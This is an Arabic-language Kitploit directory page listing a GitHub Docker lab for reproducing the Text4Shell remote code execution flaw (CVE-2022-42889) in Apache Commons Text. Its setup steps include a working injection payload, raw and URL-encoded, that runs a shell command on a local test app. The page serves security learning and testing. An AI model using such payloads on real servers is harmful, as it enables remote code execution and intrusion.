Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-42889-text4shell — بيئة مختبرية مبنية على Docker لإعادة إنتاج واختبار ثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2022-42889 (Text4Shell) في Apache Commons Text. | Kitploit
أدوات/GitHubGitHub/dimamend/cve-2022-42889-text4shell
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubdimamend/cve-2022-42889-text4shell

cve-2022-42889-text4shell

بيئة مختبرية مبنية على Docker لإعادة إنتاج واختبار ثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2022-42889 (Text4Shell) في Apache Commons Text.

عرض المستودع
9منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تثبيت maven - maven-linux


  1. قم بتثبيت Maven لإنشاء الجرة الكبيرة (fat jar)
mvn clean install
  1. بناء Docker
docker build --tag=text4shell .
  1. تشغيل Docker
docker run -p 80:8080 text4shell
  1. اختبر التطبيق
http://localhost/text4shell/attack?search=<anything>
  1. يمكن تنفيذ الهجوم عن طريق تمرير سلسلة نصية من الشكل ${prefix:name} حيث أن prefix هو البحث المذكور آنفًا:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. يمكنك أيضًا تجربة استخدام بادئات dns أو url.

  2. احصل على معرف الحاوية

docker container ls
  1. ادخل إلى التطبيق
docker exec -it <container_id> bash
  1. للتحقق من نجاح الهجوم (يجب أن ترى ملفًا باسم foo تم إنشاؤه في المجلد /tmp):
ls /tmp/
  1. لإيقاف الحاوية
docker container stop <container_id>
تنزيل الأداة